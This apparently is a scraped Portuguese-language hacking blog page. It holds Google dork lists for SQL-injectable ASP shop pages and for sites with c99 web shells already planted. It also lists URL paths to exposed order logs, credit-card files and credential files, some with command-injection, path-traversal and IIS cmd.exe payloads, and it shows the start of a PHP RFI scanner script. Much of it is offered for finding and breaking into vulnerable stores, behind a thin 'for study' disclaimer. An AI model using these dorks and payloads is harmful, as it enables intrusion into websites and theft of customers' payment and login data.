inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
inurl:"basket.asp?id="
inurl:"Book.asp?bookID="
inurl:"book_list.asp?bookid="
inurl:"book_view.asp?bookid="
inurl:"BookDetails.asp?ID="
inurl:"browse.asp?catid="
inurl:"browse_item_details.asp"
inurl:"Browse_Item_Details.asp?Store_Id="
inurl:"buy.asp?"
inurl:"buy.asp?bookid="
inurl:"bycategory.asp?id="
inurl:"cardinfo.asp?card="
inurl:"cart.asp?action="
inurl:"cart.asp?cart_id="
inurl:"cart.asp?id="
inurl:"cart_additem.asp?id="
inurl:"cart_validate.asp?id="
inurl:"cartadd.asp?id="
inurl:"cat.asp?iCat="
inurl:"catalog.asp"
inurl:"catalog.asp?CatalogID="
inurl:"catalog_item.asp?ID="
inurl:"catalog_main.asp?catid="
inurl:"category.asp"
inurl:"category.asp?catid="
inurl:"category_list.asp?id="
inurl:"categorydisplay.asp?catid="
inurl:"checkout.asp?cartid="
inurl:"checkout.asp?UserID="
inurl:"checkout_confirmed.asp?order_id="
inurl:"checkout1.asp?cartid="
inurl:"comersus_listCategoriesAndProducts.asp?idCategory ="
inurl:"comersus_optEmailToFriendForm.asp?idProduct="
inurl:"comersus_optReviewReadExec.asp?idProduct="
inurl:"comersus_viewItem.asp?idProduct="
inurl:"comments_form.asp?ID="
inurl:"contact.asp?cartId="
inurl:"content.asp?id="
inurl:"customerService.asp?TextID1="
inurl:"default.asp?catID="
inurl:"description.asp?bookid="
inurl:"details.asp?BookID="
inurl:"details.asp?Press_Release_ID="
inurl:"details.asp?Product_ID="
inurl:"details.asp?Service_ID="
inurl:"display_item.asp?id="
inurl:"displayproducts.asp"
inurl:"downloadTrial.asp?intProdID="
inurl:"emailproduct.asp?itemid="
inurl:"emailToFriend.asp?idProduct="
inurl:"events.asp?ID="
inurl:"faq.asp?cartID="
inurl:"faq_list.asp?id="
inurl:"faqs.asp?id="
inurl:"feedback.asp?title="
inurl:"freedownload.asp?bookid="
inurl:"fullDisplay.asp?item="
inurl:"getbook.asp?bookid="
inurl:"GetItems.asp?itemid="
inurl:"giftDetail.asp?id="
inurl:"help.asp?CartId="
inurl:"home.asp?id="
inurl:"index.asp?cart="
inurl:"index.asp?cartID="
inurl:"index.asp?ID="
inurl:"info.asp?ID="
inurl:"item.asp?eid="
inurl:"item.asp?item_id="
inurl:"item.asp?itemid="
inurl:"item.asp?model="
inurl:"item.asp?prodtype="
inurl:"item.asp?shopcd="
inurl:"item_details.asp?catid="
inurl:"item_list.asp?maingroup"
inurl:"item_show.asp?code_no="
inurl:"itemDesc.asp?CartId="
inurl:"itemdetail.asp?item="
inurl:"itemdetails.asp?catalogid="
inurl:"learnmore.asp?cartID="
inurl:"links.asp?catid="
inurl:"list.asp?bookid="
inurl:"List.asp?CatID="
inurl:"listcategoriesandproducts.asp?idCategory="
inurl:"modline.asp?id="
inurl:"myaccount.asp?catid="
inurl:"news.asp?id="
inurl:"order.asp?BookID="
inurl:"order.asp?id="
inurl:"order.asp?item_ID="
inurl:"OrderForm.asp?Cart="
inurl:"page.asp?PartID="
inurl:"payment.asp?CartID="
inurl:"pdetail.asp?item_id="
inurl:"powersearch.asp?CartId="
inurl:"privacy.asp?cartID="
inurl:"prodbycat.asp?intCatalogID="
inurl:"prodetails.asp?prodid="
inurl:"prodlist.asp?catid="
inurl:"product.asp?bookID="
inurl:"product.asp?intProdID="
inurl:"product_info.asp?item_id="
inurl:"productDetails.asp?idProduct="
inurl:"productDisplay.asp"
inurl:"productinfo.asp?item="
inurl:"productlist.asp?ViewType=Category&CategoryID= "
inurl:"productpage.asp"
inurl:"products.asp?ID="
inurl:"products.asp?keyword="
inurl:"products_category.asp?CategoryID="
inurl:"products_detail.asp?CategoryID="
inurl:"productsByCategory.asp?intCatalogID="
inurl:"prodView.asp?idProduct="
inurl:"promo.asp?id="
inurl:"promotion.asp?catid="
inurl:"pview.asp?Item="
inurl:"resellers.asp?idCategory="
inurl:"results.asp?cat="
inurl:"savecart.asp?CartId="
inurl:"search.asp?CartID="
inurl:"searchcat.asp?search_id="
inurl:"Select_Item.asp?id="
inurl:"Services.asp?ID="
inurl:"shippinginfo.asp?CartId="
inurl:"shop.asp?a="
inurl:"shop.asp?action="
inurl:"shop.asp?bookid="
inurl:"shop.asp?cartID="
inurl:"shop_details.asp?prodid="
inurl:"shopaddtocart.asp"
inurl:"shopaddtocart.asp?catalogid="
inurl:"shopbasket.asp?bookid="
inurl:"shopbycategory.asp?catid="
inurl:"shopcart.asp?title="
inurl:"shopcreatorder.asp"
inurl:"shopcurrency.asp?cid="
inurl:"shopdc.asp?bookid="
inurl:"shopdisplaycategories.asp"
inurl:"shopdisplayproduct.asp?catalogid="
inurl:"shopdisplayproducts.asp"
inurl:"shopexd.asp"
inurl:"shopexd.asp?catalogid="
inurl:"shopping_basket.asp?cartID="
inurl:"shopprojectlogin.asp"
inurl:"shopquery.asp?catalogid="
inurl:"shopremoveitem.asp?cartid="
inurl:"shopreviewadd.asp?id="
inurl:"shopreviewlist.asp?id="
inurl:"ShopSearch.asp?CategoryID="
inurl:"shoptellafriend.asp?id="
inurl:"shopthanks.asp"
inurl:"shopwelcome.asp?title="
inurl:"show_item.asp?id="
inurl:"show_item_details.asp?item_id="
inurl:"showbook.asp?bookid="
inurl:"showStore.asp?catID="
inurl:"shprodde.asp?SKU="
inurl:"specials.asp?id="
inurl:"store.asp?id="
inurl:"store_bycat.asp?id="
inurl:"store_listing.asp?id="
inurl:"Store_ViewProducts.asp?Cat="
inurl:"store-details.asp?id="
inurl:"storefront.asp?id="
inurl:"storefronts.asp?title="
inurl:"storeitem.asp?item="
inurl:"StoreRedirect.asp?ID="
inurl:"subcategories.asp?id="
inurl:"tek9.asp?"
inurl:"template.asp?Action=Item&pid="
inurl:"topic.asp?ID="
inurl:"tuangou.asp?bookid="
inurl:"type.asp?iType="
inurl:"updatebasket.asp?bookid="
inurl:"updates.asp?ID="
inurl:"view.asp?cid="
inurl:"view_cart.asp?title="
inurl:"view_detail.asp?ID="
inurl:"viewcart.asp?CartId="
inurl:"viewCart.asp?userID="
inurl:"viewCat_h.asp?idCategory="
inurl:"viewevent.asp?EventID="
inurl:"viewitem.asp?recor="
inurl:"viewPrd.asp?idcategory="
inurl:"ViewProduct.asp?misc="
inurl:"voteList.asp?item_ID="
inurl:"whatsnew.asp?idCategory="
inurl:"WsAncillary.asp?ID="

/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt 

sexta-feira, 25 de fevereiro de 2011

SCANNER SQLI ONLINE - GOOGLE INURL BRASIL

   Scanner SQLI Google INURL Brasil, utilizando dork simples resultados imediatos sem riscos de virus e   100% gratuito.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.


domingo, 20 de fevereiro de 2011

Dork hacking para busca de c99

Dork hacking para busca de c99

Para os espertinho que adoram um c99 safe off aé vai uma pequena lista de dork.

  safe-mode: off (not secure) drwxrwxrwx c99shell
  inurl:c99.php
  inurl:c99.php uid=0(root)
  root c99.php
  "Captain Crunch Security Team" inurl:c99
  download c99.php
  download c99.php
  download c99.php
  inurl:c99.php
  inurl:c99.php
  allinurl: c99.php
  inurl:c99.php
  allinurl: c99.php
  inurl:"/c99.php"
  allinurl: c99.php
  inurl:c99.php
  inurl:"c99.php" c99shell
   inurl:c99.php uid=0(root)
   c99shell powered by admin
   c99shell powered by admin
  inurl:"/c99.php"
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  c99 shell v.1.0 (roots)
  inurl:c99.php
  allintitle: "c99shell"
  inurl:"c99.php
  inurl:"c99.php
  allinurl: "c99.php"
  inurl:c99.php
  intitle:C99Shell v. 1.0 pre-release +uname
  intitle:C99Shell v. 1.0 pre-release +uname
  allinurl: "c99.php"
  inurl:c99.php
  inurl:"c99.php"
  inurl:"c99.php"
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:"c99.php" c99shell
  inurl:c99.php
  inurl:"c99.php"
  allinurl:c99.php
  inurl:"/c99.php
  inurl:c99.php?
  inurl:/c99.php+uname
  allinurl:"c99.php"
  allinurl:c99.php
  inurl:"c99.php"
  inurl:"c99.php"
  allinurl:c99.php
  allinurl:c99.php?
  allinurl:c99.php?
  allinurl:c99.php?
  "inurl:c99..php"
  allinurl:c99.php
   c99shell [file on secure ok ]?
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
   powered by Captain Crunch Security Team
  allinurl:c99.php
  "c99.php" filetype:php
  allinurl:c99.php
  inurl:c99.php
  allinurl:.c99.php
  "inurl:c99.php"
  c99. PHP-code Feedback Self remove
  allinurl:c99.php
  download c99.php
  allinurl:c99.php
  inurl:c99.php
  allinurl: "c99.php"
  allinurl:c99.php
  allinurl:c99.php
  c99shell
  inurl:c99.php
  inurl:c99.php
  intitle:C99Shell v. 1.0 pre-release +uname
  allinurl:"c99.php"
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  inurl:c99.php
  safe-mode: off (not secure) drwxrwxrwx c99shell
  inurl:/c99.php
  inurl:"c99.php"
  inurl:c99.php
  inurl:c99.php
  c99.php download
   inurl:c99.php
  inurl:"c99.php"
  inurl:/c99.php
  inurl:"c99.php?"
  inurl:c99.php
  inurl:c99.php
  files/c99.php
  c99shell filetype:php -echo
  c99shell powered by admin
  inurl:c99.php
  inurl:c99.php
  inurl:"c99.php"
  inurl:c99.php uid=0(root)
  allinurl:c99.php
  inurl:"c99.php"
  inurl:"c99.php"
  inurl:"/c99.php" intitle:"C99shell"
  inurl:"/c99.php" intitle:"C99shell"
  inurl:"/c99.php" intitle:"C99shell"
  C99Shell v. 1.0 pre-release build #5
  inurl:c99.php
  inurl:c99.php
  --[ c99shell v. 1.0 pre-release build #16
  c99shell linux infong
  c99shell linux infong
  C99Shell v. 1.0 pre-release build
  !C99Shell v. 1.0 beta!
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  !c99shell v. 1+Safe-mode: OFF (not secure)
  "C99Shell v. 1.0 pre-release build "
  intitle:c99shell +filetype:php
  inurl:c99.php
  intitle:C99Shell v. 1.0 pre-release +uname
  "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  intitle:!C99Shell v. 1.0 pre-release build #16! root
  !C99Shell v. 1.0 pre-release build #5!
  inurl:"c99.php"
  C99Shell v. 1.0 pre-release build #16!
  c99shell v. 1.0 pre-release build #16
  intitle:c99shell intext:uname
  allintext:C99Shell v. 1.0 pre-release build #12
  c99shell v. 1.0 pre-release build #16
  --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  allinurl: "c99.php"
  allinurl: "c99.php"
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  "c99shell v 1.0"
  ftp apache inurl:c99.php
  c99shell+v.+1.0 16
  C99Shell v. 1.0 pre-release build #16 download
  intitle:c99shell "Software: Apache"
  allinurl: c99.php
  allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
  powered by Captain Crunch Security Team
  powered by Captain Crunch Security Team
  !C99Shell v. 1.0 pre-release build #5!
  c99shell v. 1.0 release security
  c99shell v. 1.0 pre-release build
  inurl:c99.php
  c99shell [file on secure ok ]?
  C99Shell v. 1.3
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  inurl:c99.php uid=0(root)
   powered by Captain Crunch Security Team
  C99Shell v. 1.0 pre-release build #16
  c99shell[on file]ok
  c99shell[file on ]ok
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  inurl:c99.php
  "C99Shell v. 1.0 pre"
  =C99Shell v. 1.0 pre-release
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  c99shell v. pre-release build
  inurl:c99.php c99 shell
  inurl:c99.php c99 shell
  powered by Captain Crunch Security Team
  inurl:c99.php
  inurl:c99.php
  !C99Shell v. 1.0 pre-release build #5!
  intitle:"c99shell" filetype:php root
  intitle:"c99shell" Linux infong 2.4
  C99Shell v. 1.0 beta !
  C99Shell v. 1.0 pre-release build #
  inurl:"c99.php"
  allintext:C99Shell v. 1.0 pre-release build #12
  "C99Shell v. 1.0 pre"
  powered by Captain Crunch Security Team
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  inurl:/c99.php?
  allinurl:c99.php
  intitle:C99Shell pre-release
  inurl:"c99.php"
  powered by Captain Crunch Security Team
  inurl:c99.php
  C99Shell v. 1.0 pre-release build #16!
  allinurl:c99.php
  C99Shell v. 1.0 pre-release build #16 administrator
  intitle:c99shell filetype:php
  powered by Captain Crunch Security Team
  powered by Captain Crunch Security Team
  C99Shell v. 1.0 pre-release build #12
  c99shell v.1.0
  allinurl:c99.php
  "c99shell v. 1.0 pre-release build"
  inurl:"c99.php" filetype:php
  "c99shell v. 1.0 "
  ok c99.php
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
   c99shell v. 1.0 pre-release build #16 |
  !C99Shell v. 1.0 pre-release build #5!
  !C99Shell v. 1.0 pre-release build #5!
  allinurl:/c99.php
  powered by Captain Crunch Security Team
  inurl:c99.php
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  inurl:c99.php
  powered by Captain Crunch Security Team
  inurl:c99.php
  C99Shell v. 1.0 pre-release
  inurl:c99.php
  inurl:c99.php ext:php
  inurl:"c99.php"
  allinurl:"c99.php"
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  powered by Captain Crunch Security Team
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  C99Shell v. 1.0 pre-release build #16 software apache
   Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  "c99shell v 1.0"
  inurl:"c99.php"
  allintitle: C99shell filetype:php
  C99Shell v. 1.0 pre-release build #16!
  "c99shell v. 1.0 pre-release"
  c99shell v. 1.0 pre-release build #5
  allinurl:"c99.php" filetype:php
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  !C99Shell v. 1.0 pre-release build #16!
  inurl:c99.php
  intitle:C99Shell v. 1.0 pre-release +uname
  inurl:c99.php
  c99shell v. 1.0
  allinurl: c99.php
   --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  inurl:"/c99.php"
  c99shell +uname
  c99shell php + uname
  c99shell php + uname
  --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  allinurl:c99.php
  !C99Shell v. 1.0 pre-release build #5!
  C99Shell v.1.0 pre-release
  Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  inurl:c99.php
  intitle:c99shell filetype:php
  "Encoder Tools Proc. FTP brute"
  "c99" filetype:php intext:"Safe-Mode: OFF"
  c99shell v. 1.0 pre
  inurl:c99.php
  intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
  inurl:admin/files/
  intitle:"index of /" "c99.php"
  intitle:"index of" intext:c99.php
  intitle:index.of c99.php
  intitle:"index of" + c99.php
  intitle:index/of file c99.php
  intitle:index/of file c99.php
  index of /admin/files/
  intitle:"Index of/"+c99.php
  c99.php "intitle:Index of "
  c99.php "intitle:Index of "
  c99.php "intitle:Index of "
  intitle:index.of c99.php
  img/c99.php
  intitle:index.of c99.php
   img.c99.php
  intitle:"Index of/"+c99.php
  "index of /" c99.php
  c99.php
  intitle:"Index of" c99.php
  "index of" c99.php
  "Index of/"+c99.php

SCRIPT PHP Security-Shell RFI Scanner v1.0


Segurança Shell RFI Scanner v1.0 é um scan de rfi pra você scanner de plantão.


* Copyright (C) 2007 por pentest
* Http://security-sh3ll.com
* Este programa é software livre, pode redistribuí-lo e / ou modificá-
* Sob os termos da GNU General Public License conforme publicada pela
*
* Mas SEM NENHUMA GARANTIA, sem mesmo a garantia implícita de *COMERCIALIZAÇÃO ou ADEQUAÇÃO PARA UM DETERMINADO PROPÓSITO. Veja o * Licença Pública Geral GNU para obter mais detalhes.


/***************************************************************************
 *   PHP Security-Shell RFI Scanner v1.0                                   *
 *                                                                         *
 *   Copyright (C) 2007 by pentest                                         *
 *                                                                         *
 *   http://security-sh3ll.com                                             *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 ***************************************************************************/
 
    $escan_inc_regex   = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
    /* Regex to extract the names of variables */
    $escan_var_regex   = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
    /* Array of file extensions to scan */
    $escan_valid_ext   = array( 'php' );
    /* Maximum size of a file to scan, scans all if 0 */
    $escan_max_size    = 0;
    /* Counter crawled directory */
    $escan_dir_count   = 0;
    /* Perpetual scanned files */
    $escan_file_count  = 0;
    /* Perpetual potential rfi found */
    $escan_match_count = 0;
    /*Perpetual crawled total bytes */
    $escan_byte_count  = 0;
 
    escan_banner();
 
 
    if( $argc < 2 ){
        escan_usage($argv[0]);
    }
    else{
 
        $stime = escan_get_mtime();
 
        escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );
 
        $etime = escan_get_mtime();
 
        print "\n@ Scan report : \n\n" .
              "\t$escan_dir_count directory .\n".
              "\t$escan_file_count file .\n".
              "\t" . escan_format_size($escan_byte_count) . " .\n".
              "\t$escan_match_count Potential RFI .\n".
              "\t".($etime-$stime) . " Second Processing .\n\n";
    }
 
    /* A string formats in a magnitude expressed in bytes */
    function escan_format_size($bytes)
    {
        if( $bytes < 1024       ) return "$bytes bytes";
